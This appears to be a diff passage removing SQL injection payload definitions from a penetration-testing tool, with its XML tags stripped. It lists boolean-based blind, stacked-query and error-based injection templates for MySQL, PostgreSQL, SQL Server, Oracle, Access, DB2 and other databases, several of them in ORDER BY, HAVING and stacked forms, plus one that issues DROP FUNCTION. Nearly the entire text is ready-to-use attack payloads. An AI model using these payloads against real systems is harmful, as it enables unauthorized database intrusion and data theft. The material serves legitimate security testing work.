- MySQL
-
-
-
-
- MySQL boolean-based blind - Parameter replace (ELT)
- 1
- 4
- 1
- 1,2,3
- 3
- ELT([INFERENCE],[RANDNUM])
-
- ELT([RANDNUM]=[RANDNUM],[RANDNUM1])
-
-
- ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])
-
-
- MySQL
-
-
-
-
- MySQL boolean-based blind - Parameter replace (ELT - original value)
- 1
- 5
- 1
- 1,2,3
- 3
- ELT([INFERENCE],[ORIGVALUE])
-
- ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])
-
-
- ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])
-
-
- MySQL
-
-
-
-
- MySQL boolean-based blind - Parameter replace (bool*int)
- 1
- 4
- 1
- 1,2,3
- 3
- ([INFERENCE])*[RANDNUM]
-
- ([RANDNUM]=[RANDNUM])*[RANDNUM1]
-
-
- ([RANDNUM]=[RANDNUM1])*[RANDNUM1]
-
-
- MySQL
-
-
-
-
- MySQL boolean-based blind - Parameter replace (bool*int - original value)
- 1
- 5
- 1
- 1,2,3
- 3
- ([INFERENCE])*[ORIGVALUE]
-
- ([RANDNUM]=[RANDNUM])*[ORIGVALUE]
-
-
- ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]
-
-
- MySQL
-
-
-
-
- PostgreSQL boolean-based blind - Parameter replace
- 1
- 3
- 1
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))
-
-
- PostgreSQL
-
-
-
-
- PostgreSQL boolean-based blind - Parameter replace (original value)
- 1
- 4
- 1
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
-
- PostgreSQL
-
-
-
-
-
- PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES)
- 1
- 5
- 1
- 1,2,3
- 3
- (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)
-
- (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)
-
-
- (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
-
-
- PostgreSQL
-
-
-
-
-
- PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)
- 1
- 5
- 1
- 1,2,3
- 3
- (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)
-
- (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)
-
-
- (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
- 1
- 3
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
- 1
- 4
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle boolean-based blind - Parameter replace
- 1
- 3
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- Oracle
-
-
-
-
- Oracle boolean-based blind - Parameter replace (original value)
- 1
- 4
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- Oracle
-
-
-
-
- Informix boolean-based blind - Parameter replace
- 1
- 3
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)
-
-
- Informix
-
-
-
-
- Informix boolean-based blind - Parameter replace (original value)
- 1
- 4
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)
-
-
- Informix
-
-
-
-
- Microsoft Access boolean-based blind - Parameter replace
- 1
- 3
- 1
- 1,3
- 3
- IIF([INFERENCE],[RANDNUM],1/0)
-
- IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0)
-
-
- IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)
-
-
- Microsoft Access
-
-
-
-
- Microsoft Access boolean-based blind - Parameter replace (original value)
- 1
- 4
- 1
- 1,3
- 3
- IIF([INFERENCE],[ORIGVALUE],1/0)
-
- IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)
-
-
- IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
-
-
- Microsoft Access
-
-
-
-
-
- Boolean-based blind - Parameter replace (DUAL)
- 1
- 2
- 1
- 1,2,3
- 3
- (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
-
- (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
-
-
- (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
-
-
-
-
- Boolean-based blind - Parameter replace (DUAL - original value)
- 1
- 3
- 1
- 1,2,3
- 3
- (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
-
- (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
-
-
- (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END)
-
-
-
-
-
-
- Boolean-based blind - Parameter replace (CASE)
- 1
- 2
- 1
- 1,3
- 3
- (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END)
-
- (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END)
-
-
- (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END)
-
-
-
-
- Boolean-based blind - Parameter replace (CASE - original value)
- 1
- 3
- 1
- 1,3
- 3
- (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)
-
- (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)
-
-
- (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
-
-
-
-
-
-
- MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
- 1
- 2
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)
- 1
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause
- 1
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- MySQL
- < 5.0
-
-
-
-
- MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)
- 1
- 4
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))
-
-
- MySQL
- < 5.0
-
-
-
-
- PostgreSQL boolean-based blind - ORDER BY, GROUP BY clause
- 1
- 2
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))
-
-
- PostgreSQL
-
-
-
-
-
- PostgreSQL boolean-based blind - ORDER BY clause (original value)
- 1
- 4
- 1
- 3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
-
- PostgreSQL
-
-
-
-
-
-
- PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES)
- 1
- 5
- 1
-
- 3
- 1
- ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)
-
- ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)
-
-
- ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
- 1
- 3
- 1
- 3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value)
- 1
- 4
- 1
- 3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle boolean-based blind - ORDER BY, GROUP BY clause
- 1
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- Oracle
-
-
-
-
- Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value)
- 1
- 4
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- Oracle
-
-
-
-
- Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause
- 1
- 4
- 1
- 2,3
- 1
- ,IIF([INFERENCE],1,1/0)
-
- ,IIF([RANDNUM]=[RANDNUM],1,1/0)
-
-
- ,IIF([RANDNUM]=[RANDNUM1],1,1/0)
-
-
- Microsoft Access
-
-
-
-
- Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value)
- 1
- 5
- 1
- 2,3
- 1
- ,IIF([INFERENCE],[ORIGVALUE],1/0)
-
- ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)
-
-
- ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
-
-
- Microsoft Access
-
-
-
-
- SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause
- 1
- 4
- 1
- 2,3
- 1
- ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END)
-
- ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END)
-
-
- ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)
-
-
- SAP MaxDB
-
-
-
-
- SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)
- 1
- 5
- 1
- 2,3
- 1
- ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)
-
- ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)
-
-
- ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
-
-
- SAP MaxDB
-
-
-
-
- IBM DB2 boolean-based blind - ORDER BY clause
- 1
- 4
- 1
- 3
- 1
- ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
-
- ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
-
-
- ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
-
-
- IBM DB2
-
-
-
-
- IBM DB2 boolean-based blind - ORDER BY clause (original value)
- 1
- 5
- 1
- 3
- 1
- ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
-
- ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
-
-
- ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)
-
-
- IBM DB2
-
-
-
-
-
- HAVING boolean-based blind - WHERE, GROUP BY clause
- 1
- 3
- 1
- 1,2
- 1
- HAVING [INFERENCE]
-
- HAVING [RANDNUM]=[RANDNUM]
-
-
- HAVING [RANDNUM]=[RANDNUM1]
-
-
-
-
-
-
- MySQL >= 5.0 boolean-based blind - Stacked queries
- 1
- 4
- 1
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
- #
-
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL < 5.0 boolean-based blind - Stacked queries
- 1
- 5
- 1
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
- #
-
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)
-
-
- MySQL
- < 5.0
-
-
-
-
- PostgreSQL boolean-based blind - Stacked queries
- 1
- 3
- 1
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
- --
-
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
-
-
- PostgreSQL
-
-
-
-
-
- PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES)
- 1
- 5
- 1
- 1-8
- 1
- ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1
-
- ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1
- --
-
-
- ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
- 1
- 3
- 1
- 1-8
- 1
- ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
-
- ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
- --
-
-
- ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Microsoft SQL Server/Sybase boolean-based blind - Stacked queries
- 1
- 4
- 1
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)
- --
-
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)
-
-
- Microsoft SQL Server
- Sybase
-
-
-
-
- Oracle boolean-based blind - Stacked queries
- 1
- 4
- 1
- 1-8
- 1
- ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL
- --
-
-
- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL
-
-
- Oracle
-
-
-
-
- Microsoft Access boolean-based blind - Stacked queries
- 1
- 5
- 1
- 1-8
- 1
- ;IIF([INFERENCE],1,1/0)
-
- ;IIF([RANDNUM]=[RANDNUM],1,1/0)
- %16
-
-
- ;IIF([RANDNUM]=[RANDNUM1],1,1/0)
-
-
- Microsoft Access
-
-
-
-
- SAP MaxDB boolean-based blind - Stacked queries
- 1
- 5
- 1
- 1-8
- 1
- ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END
-
- ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END
- --
-
-
- ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END
-
-
- SAP MaxDB
-
-
-
-
diff --git a/data/xml/payloads/error_based.xml b/data/xml/payloads/error_based.xml
deleted file mode 100644
index 0d717f96170..00000000000
--- a/data/xml/payloads/error_based.xml
+++ /dev/null
@@ -1,1538 +0,0 @@
-
-
-
-
-
- MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
- 2
- 4
- 1
- 1,2,3,8,9
- 1
- AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
-
- MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)
- 2
- 4
- 3
- 1,8,9
- 1
- OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)
- 2
- 4
- 1
- 1,2,3,8,9
- 1
- AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))
-
- AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)
- 2
- 4
- 3
- 1,8,9
- 1
- OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))
-
- OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
- 2
- 4
- 1
- 1,2,3,8,9
- 1
- AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])
-
- AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.6
-
-
-
-
- MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)
- 2
- 4
